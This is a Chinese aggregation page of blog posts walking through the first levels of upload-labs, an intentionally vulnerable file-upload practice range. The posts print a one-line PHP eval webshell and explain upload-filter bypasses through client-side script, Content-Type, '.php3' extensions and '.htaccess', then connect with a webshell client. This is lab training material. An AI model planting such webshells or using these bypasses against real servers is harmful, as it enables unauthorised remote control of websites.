精华内容
参与话题
问答
  • upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 0x01 Screenshot 1.1 主界面 ...
  • upload-labs-0.1.zip

    2020-09-16 15:56:04
    upload-labs-0.1.zip 。上传漏洞靶机安装包,解压放到容器中即可运行。文件上传漏洞 常见的漏洞分类 服务器配置不当导致文件上传 开源编辑器存在上传漏洞 本地文件上传限制可以上传被绕过 服务器端过滤不严...
  • upload-labs-master.zip

    2020-06-22 20:16:52
    文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master
  • upload-labs--Pass02

    2020-05-21 20:11:27
    查看源码: 代码意思就是,Content-Type类型应该是jpeg.png,gif,然后将我们上传的以php后缀的一句话木马(正常情况下就是上传php文件才能连接上),用bp抓包,将Connet-Type类型修改成image/jpeg,上传即可,继续用... ...

    查看源码:
    在这里插入图片描述
    代码意思就是,Content-Type类型应该是jpeg.png,gif,然后将我们上传的以php后缀的一句话木马(正常情况下就是上传php文件才能连接上),用bp抓包,将Connet-Type类型修改成image/jpeg,上传即可,继续用蚁剑测试,当显示连接成功,找到有flag相应的目录,找到flag

    展开全文
  • Upload-Labs-Pass-01

    2020-03-17 20:32:00
    今日开始每日一上传,哈哈哈哈哈哈哈 环境搭建 Windows 7 phpstudy 文件上传 访问pass_01 右击查看前端源代码,发现一段前端验证的JS代码段 ...script type="text/javascript">... var file = document....

    今日开始每日一上传,哈哈哈哈哈哈哈

    环境搭建

    • Windows 7
    • phpstudy

    文件上传

    访问pass_01

    Web Site

    右击查看前端源代码,发现一段前端验证JS代码段

    <script type="text/javascript">
        function checkFile() {
            var file = document.getElementsByName('upload_file')[0].value;
            if (file == null || file == "") {
                alert("请选择要上传的文件!");
                return false;
            }
            //定义允许上传的文件类型
            var allow_ext = ".jpg|.png|.gif";
            //提取上传文件的类型
            var ext_name = file.substring(file.lastIndexOf("."));
            //判断上传文件类型是否允许上传
            if (allow_ext.indexOf(ext_name) == -1) {
                var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
                alert(errMsg);
                return false;
            }
        }
    </script>

    简单的写一个一句话,保存为shell.jpg

    <?php
        @eval($_POST['quail']);
    ?>

    打开BurpSuite,进行抓包,将请求头的jpg改成php,放包.

    BurpSuite

    放完包,回到浏览器,发现出现一个撕裂的图片

    上传的截图

    使用蚁剑进行连接

    测试连接

    查看当前用户

    whoami

    后记

    虽然这个特别简单,但是我还是想借助每题一写监督自己坚持下去,加油💪!

    展开全文
  • Upload-Labs-Pass-03

    2020-10-07 12:11:49
    Upload-Labs-Pass-03 我们首先尝试直接注入 在此提示不允许上传.asp,.aspx,.php,.jsp后缀文件。 通过提示我们可以得知在这里我们需要使用文件后缀绕过的方式来上传。 原理:文件后缀绕过攻击时服务端代码中限制了...

    Upload-Labs-Pass-03

    在这里插入图片描述
    我们首先尝试直接注入
    在这里插入图片描述
    在此提示不允许上传.asp,.aspx,.php,.jsp后缀文件。
    通过提示我们可以得知在这里我们需要使用文件后缀绕过的方式来上传。

    原理:文件后缀绕过攻击时服务端代码中限制了某些后缀的文件不能上传,但是有些apache是允许解析其他文件后缀的,在apache的解析顺序中,是从右到左开始解析文件后缀的,如果最右侧的扩展名不可识别,就继续往左判断,直至遇到可以解析的后缀为止所以如果上传文件名类似1.php.xxxx,因为后缀xxxx不能解析,所以向左解析php。服务器端通过函数patchinfo()获取文件后缀,将后缀转换为小写后,判断是不是php,如果是则不允许上传。

    演示
    将php文件后缀改为php3,并上传
    在这里插入图片描述
    上传成功,查看文件路径
    在这里插入图片描述
    使用蚁剑进行连接
    在这里插入图片描述
    连接成功
    在这里插入图片描述

    本教程仅供学习使用,不得用于非法用途!!!

    展开全文
  • Upload-Labs-Pass-02

    2020-10-07 11:00:14
    Upload-Labs-Pass-02 首先我们还是尝试直接上传小马 在此提示文件类型不正确 在这里需要使用文件类型绕过的方法:在客户端上传文件时,通过burp进行抓包,将数据包中的Content-Type修改为所上传文件对应的值即可。...

    Upload-Labs-Pass-02

    在这里插入图片描述
    首先我们还是尝试直接上传小马
    在这里插入图片描述
    在此提示文件类型不正确
    在这里需要使用文件类型绕过的方法:在客户端上传文件时,通过burp进行抓包,将数据包中的Content-Type修改为所上传文件对应的值即可。Content-Type是通过客户端传递的是可以任意修改的。当上传一个php文件时,将Content-Type的值修改为image/jpeg,就可以绕过服务端的检测。

    原理:服务段判断$_files[“file”][“type”]是不是图片的格式(image/jpg,image/gif,image/jpeg),如果不是,则不允许上传该文件,而_files[“file”][“type”]是客户端请求数据包中的Content-Type,所以可以通过修改Content-Type的值进行绕过。

    演示
    选择php文件上传,并使用burp抓包
    在这里插入图片描述
    在这里插入图片描述
    修改此处为
    在这里插入图片描述
    修改后放包,使用蚁剑进行连接
    在这里插入图片描述

    成功
    在这里插入图片描述

    本教程仅供学习使用,不得用于非法用途!!!

    展开全文
  • Upload-Labs-Pass-04

    2020-10-08 10:49:20
    Upload-Labs-Pass-04 我们依然是直接尝试上传php文件 提示显示此文件不允许被上传 通过点击右上角的查看提示可以知道,几乎过滤了所有有问题的后缀名,除了.htaccess htaccess文件内容 SetHandler application/x-...
  • upload-labs--wp(21关)

    2020-03-20 12:10:51
    第一题 不多说,直接上传 出现上图所示,如果你bp开启着抓包,你会发现,并没有抓到任何数据包,就被拦截了,这说明是前端验证没禁用js或修改前端代码即可 ... 最后加个源码分析吧: function checkFile() { //定义...

空空如也

1 2 3 4 5 ... 20
收藏数 146,059
精华内容 58,423
关键字:

upload